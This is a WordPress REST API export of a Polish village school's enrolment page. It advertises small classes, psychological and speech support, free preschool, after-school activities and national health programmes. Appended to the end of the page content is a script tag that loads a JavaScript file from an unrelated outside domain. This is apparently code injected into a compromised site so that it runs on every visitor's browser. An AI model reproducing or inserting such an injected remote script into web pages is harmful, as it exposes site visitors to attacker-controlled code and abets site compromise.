{"id":79,"date":"2015-12-15T13:46:53","date_gmt":"2015-12-15T12:46:53","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=79"},"modified":"2020-04-23T09:21:22","modified_gmt":"2020-04-23T07:21:22","slug":"rekrutacja","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/rekrutacja\/","title":{"rendered":"Rekrutacja"},"content":{"rendered":"<h2 style=\"text-align: center;\"><span style=\"color: #0000ff;\"><strong>Co proponujemy Tobie i Twojemu Dziecku?<\/strong><\/span><\/h2>\n<p style=\"text-align: justify;\"><span style=\"color: #ff0000;\"><strong>\u2022\u00a0\u00a0\u00a0 jeden nauczyciel dla 15 uczni\u00f3w!\u00a0 <\/strong><\/span><br \/>\n&#8211; w szko\u0142ach masowych: jeden nauczyciel dla 26 uczni\u00f3w, czasami nawet wi\u0119cej;<br \/>\n&#8211; ma\u0142a liczebno\u015b\u0107 uczni\u00f3w w klasach umo\u017cliwia indywidualny kontakt ucznia z nauczycielem;<\/p>\n<p><span style=\"color: #008000;\"><strong>\u2022\u00a0\u00a0\u00a0 diagnoza indywidualnych potrzeb rozwojowych ucznia<\/strong><\/span><br \/>\n&#8211; diagnozy dokonujemy we wsp\u00f3\u0142pracy z rodzicami dziecka oraz Poradni\u0105 Psychologiczno &#8211; Pedagogiczn\u0105 w \u015awidnicy;diagnoza m. in. pod k\u0105tem trudno\u015bci w nauce (dysleksja, dysgrafia);<br \/>\n&#8211; dostosowywanie tre\u015bci nauczania do mo\u017cliwo\u015bci dziecka;<br \/>\n<em>Je\u015bli Twoje dziecko b\u0119dzie mia\u0142o trudno\u015bci w nauce, zrobimy wszystko, aby rozpozna\u0107 jego potrzeby i zapewni\u0107 mu wsparcie.<\/em><\/p>\n<p><span style=\"color: #ff6600;\"><strong>\u2022\u00a0\u00a0\u00a0 wsparcie psychologa, logopedy i pedagoga na terenie szko\u0142y<\/strong><\/span><br \/>\n&#8211; dost\u0119p do tych specjalist\u00f3w jest znacznie wi\u0119kszy ni\u017c w masowych szko\u0142ach;<br \/>\n&#8211; nauczyciele \u2013 wychowawcy staraj\u0105 si\u0119 wychodzi\u0107 naprzeciw problemom dzieci;<\/p>\n<p><span style=\"color: #800000;\"><strong>\u2022\u00a0\u00a0\u00a0 rozw\u00f3j uczni\u00f3w zdolnych<\/strong><\/span><br \/>\n&#8211; w ma\u0142ej klasie jeste\u015bmy w stanie wychwyci\u0107 uczni\u00f3w najzdolniejszych i zadba\u0107 o ich rozw\u00f3j ju\u017c w ramach codziennych zaj\u0119\u0107;<br \/>\n&#8211; umo\u017cliwiamy przygotowanie i udzia\u0142 w konkursach o r\u00f3\u017cnorodnej tematyce;<br \/>\n&#8211; nasi uczniowie wielokrotnie mogli zab\u0142ysn\u0105\u0107, odnosz\u0105c sukcesy o szerokim zasi\u0119gu;<\/p>\n<p><span style=\"color: #800080;\"><strong>\u2022\u00a0\u00a0\u00a0 popo\u0142udniowe, bezp\u0142atne zaj\u0119cia dodatkowe<\/strong><\/span><br \/>\n&#8211; zaj\u0119cia teatralne, informatyczne, taneczne, SKS, muzyczne;<br \/>\n&#8211; czekamy na inwencj\u0119 dzieci;<\/p>\n<p><span style=\"color: #ff00ff;\"><strong>\u2022\u00a0\u00a0\u00a0 bezp\u0142atny oddzia\u0142 przedszkolny, niezale\u017cnie od liczby godzin<\/strong><\/span><br \/>\n&#8211; w innych przedszkolach pobyt dziecka jest bezp\u0142atny tylko do 5 godzin dziennie,<br \/>\npo tym czasie rodzice p\u0142ac\u0105 za pobyt dziecka;<br \/>\n&#8211; bezp\u0142atne lekcje j\u0119zyka angielskiego w ramach zaj\u0119\u0107 przedszkolnych<\/p>\n<p><span style=\"color: #ff9900;\"><strong>\u2022\u00a0\u00a0\u00a0 codzienne zaj\u0119cia \u015bwietlicowe <\/strong><\/span><br \/>\n-bezpieczny pobyt na terenie szko\u0142y w godz. 7.00 \u2013 16.00 dla dzieci,<br \/>\nkt\u00f3rych rodzice pracuj\u0105 zawodowo;<\/p>\n<p><span style=\"color: #33cccc;\"><strong>\u2022\u00a0\u00a0\u00a0 badanie s\u0142uchu, wzroku i logopedyczne<\/strong><\/span><br \/>\n&#8211; badania organizujemy we wsp\u00f3\u0142pracy z Poradni\u0105 Psychologiczno \u2013 Pedagogiczn\u0105 w \u015awidnicy,<br \/>\nw zale\u017cno\u015bci od potrzeb dzieci;<\/p>\n<p><strong><span style=\"color: #99cc00;\">\u2022\u00a0\u00a0\u00a0 szko\u0142a na wsi, blisko przyrody<\/span> <\/strong><br \/>\n&#8211; umo\u017cliwia to prowadzenie zaj\u0119\u0107 w terenie;<br \/>\n&#8211; dziecko, szczeg\u00f3lnie ma\u0142e, uczy si\u0119 przez do\u015bwiadczenie, przez naturalny kontakt z otoczeniem;<\/p>\n<p><span style=\"color: #666699;\"><strong>\u2022\u00a0\u00a0\u00a0 szko\u0142a wci\u0105\u017c si\u0119 rozwija!<\/strong><\/span><br \/>\n&#8211; realizujemy projekty z wykorzystaniem \u015brodk\u00f3w unijnych; \u015brodki te przeznaczone s\u0105 na zakup nowoczesnych pomocy dydaktycznych, oraz organizacj\u0119 profesjonalnych zaj\u0119\u0107 dla dzieci;<br \/>\n&#8211; dysponujemy sal\u0105 do gimnastyki, pracowni\u0105 komputerow\u0105, ogrodzonym placem przed szko\u0142\u0105, ogrodem z ma\u0142ym placem zabaw;<\/p>\n<p><span style=\"color: #ff0000;\"><strong>\u2022\u00a0\u00a0\u00a0 og\u00f3lnopolskie programy i kampanie<\/strong><\/span><br \/>\n&#8211; uczniowie naszej szko\u0142y bior\u0105 udzia\u0142 w og\u00f3lnopolskich inicjatywach, m. in. \u201eRadosna Szko\u0142a\u201d, \u201eIndywidualizacja procesu nauczania i wychowania\u201d, \u201eWarto by\u0107 dobrym\u201d,\u00a0 \u201e5 porcji warzyw i owoc\u00f3w\u201d, \u201eCzas na zdrowie\u201d, \u201eWyr\u00f3wnywanie szans edukacyjnych\u201d,\u00a0 \u201eSzklanka mleka\u201d, \u201eFluoryzacja z\u0119b\u00f3w\u201d, \u201eKlub bezpiecznego puchatka\u201d;<\/p>\n<p><span style=\"color: #1fa3e0;\"><strong>\u2022\u00a0\u00a0\u00a0 bezpieczna szko\u0142a, rodzinna atmosfera!<\/strong><\/span><br \/>\n&#8211; szko\u0142a posiada certyfikaty: \u201dSzko\u0142a bez przemocy\u201d, \u201eSzko\u0142a dbaj\u0105ca o bezpiecze\u0144stwo\u201d;<br \/>\n&#8211; w ma\u0142ej szkole wszyscy si\u0119 dobrze znamy, to pozwala budowa\u0107 przyjazn\u0105 dla dziecka atmosfer\u0119;<br \/>\n<img loading=\"lazy\" class=\"aligncenter wp-image-1034 size-full\" src=\"http:\/\/spmrowiny.gmina.zarow.pl\/wp-content\/uploads\/2016\/01\/dzieci37.gif\" alt=\"dzieci37\" width=\"100\" height=\"112\" \/><\/p>\n<p><span style=\"color: #993366;\"><strong>MA\u0141A SZKO\u0141A BLISKA TOBIE I TWOJEMU DZIECKU<\/strong><\/span><\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #008000;\"><strong>ZAPRASZAMY!<\/strong><\/span><\/h3>\n<p><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Co proponujemy Tobie i Twojemu Dziecku? \u2022\u00a0\u00a0\u00a0 jeden nauczyciel dla 15 uczni\u00f3w!\u00a0 &#8211; w szko\u0142ach masowych: jeden nauczyciel dla 26 uczni\u00f3w, czasami nawet wi\u0119cej; &#8211; ma\u0142a liczebno\u015b\u0107 uczni\u00f3w w klasach umo\u017cliwia indywidualny kontakt ucznia z nauczycielem; \u2022\u00a0\u00a0\u00a0 diagnoza indywidualnych potrzeb rozwojowych ucznia &#8211; diagnozy dokonujemy we wsp\u00f3\u0142pracy z rodzicami dziecka oraz Poradni\u0105 Psychologiczno &#8211; Pedagogiczn\u0105 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1033,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/79"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=79"}],"version-history":[{"count":12,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/79\/revisions"}],"predecessor-version":[{"id":15045,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/79\/revisions\/15045"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media\/1033"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=79"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}